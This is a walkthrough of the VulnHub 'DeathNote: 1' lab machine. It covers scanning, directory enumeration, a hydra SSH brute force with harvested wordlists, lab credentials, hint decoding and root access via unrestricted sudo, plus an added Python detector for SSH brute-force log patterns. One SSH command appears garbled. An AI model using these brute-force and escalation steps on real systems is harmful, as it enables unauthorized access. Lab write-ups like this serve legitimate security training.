VulnHub: DeathNote: 1
Today we will take a look at VulnHub: DeathNote. My goal in sharing this writeup is to show you the way if you get stuck. Please try to understand each step and take notes.
- Network scan
Command: sudo nmap -p- -sV -sC -oN nmap/open --open 192.168.0.109
- Web pages
If you run into a problem like this when loading the page, edit the hosts file:
Command: sudo nano /etc/hosts
Let’s take note of everything useful on the page (names, odd sentences, anything we may use later).
If we press the hint button, we will come across a sentence.
L’s comment is below. Let’s note it.
my fav line is
- Find site directories
Command: gobuster dir -u http://192.168.0.109 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt
Let’s look at the robots.txt file.
We found a new directory.
The .jpg file may be damaged. Let’s download it.
Command: wget http://deathnote.vuln/important.jpg
Command: cat important.jpg
It indicates that the password will be in the hint button on the site. So the password is ‘iamjustic3’.
The login could be ‘kira’ or ‘l’. Let’s check.
user: kira pass: iamjustic3
There is a .txt file like this on the media page.
Its entries look like passwords. Let’s save them as pass.txt.
Let’s add the usernames we noted to user.txt.
Let’s attack SSH.
Command: hydra -L user.txt -P pass.txt ssh://192.168.0.109 -V -t 4
user: l pass: death4me
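Seen from the target's side, a run like the hydra command above leaves a burst of failed SSH logins from one source across several usernames, followed by a success. The sketch below is an added example, not part of the original writeup: the log lines, the source addresses and the thresholds are constructed assumptions, and the regex assumes the usual OpenSSH "Failed/Accepted password" syslog format.

```python
import re
from collections import defaultdict

# Constructed sshd log lines (assumed format and addresses, not from the writeup).
SAMPLE_LOG = """\
Sep  4 10:15:01 deathnote sshd[1201]: Failed password for kira from 192.168.0.50 port 40112 ssh2
Sep  4 10:15:01 deathnote sshd[1202]: Failed password for kira from 192.168.0.50 port 40114 ssh2
Sep  4 10:15:02 deathnote sshd[1203]: Failed password for l from 192.168.0.50 port 40116 ssh2
Sep  4 10:15:02 deathnote sshd[1204]: Failed password for admin from 192.168.0.10 port 51000 ssh2
Sep  4 10:15:09 deathnote sshd[1204]: Accepted password for admin from 192.168.0.10 port 51000 ssh2
Sep  4 10:15:10 deathnote sshd[1205]: Failed password for l from 192.168.0.50 port 40120 ssh2
Sep  4 10:15:11 deathnote sshd[1206]: Failed password for kira from 192.168.0.50 port 40122 ssh2
Sep  4 10:15:12 deathnote sshd[1207]: Failed password for l from 192.168.0.50 port 40124 ssh2
Sep  4 10:15:13 deathnote sshd[1208]: Accepted password for l from 192.168.0.50 port 40130 ssh2
"""

EVENT = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)

def find_bruteforce(log_text, min_failures=5, min_users=2):
    """Flag sources with many failures across several users, and list any
    account that was logged into from that source after the burst."""
    failures = defaultdict(int)
    users = defaultdict(set)
    logins = defaultdict(list)
    for line in log_text.splitlines():
        m = EVENT.search(line)
        if not m:
            continue
        src, user = m["src"], m["user"]
        if m["result"] == "Failed":
            failures[src] += 1
            users[src].add(user)
        elif failures[src] >= min_failures and len(users[src]) >= min_users:
            # Success right after a guessing burst: treat the account as compromised.
            logins[src].append(user)
    return {
        src: {"failures": n, "users_tried": sorted(users[src]),
              "logins_after_burst": logins[src]}
        for src, n in failures.items()
        if n >= min_failures and len(users[src]) >= min_users
    }

if __name__ == "__main__":
    print(find_bruteforce(SAMPLE_LOG))
```

A single mistyped password followed by a success (the constructed `admin` lines) stays below both thresholds and is not flagged.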
Command: ssh firstname.lastname@example.org
It was Brainfuck.
Brainfuck/Text/Ook! obfuscator - deobfuscator. Decode and encode online.
The /opt folder also has hints that will be useful to us.
CyberChef: The Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis
Command: su kira
Let’s decode in CyberChef again.
Let’s look at the /var folder.
Command: cd /var
Command: cat misa
it is toooo late for misa
Let’s check the privileges.
Command: sudo -l
(ALL : ALL) ALL
This means that we can run any command as any user with sudo. Let’s get root.
Command: sudo su
And now we are root.
“If you have any questions or comments, please do not hesitate to write. Have a good day.”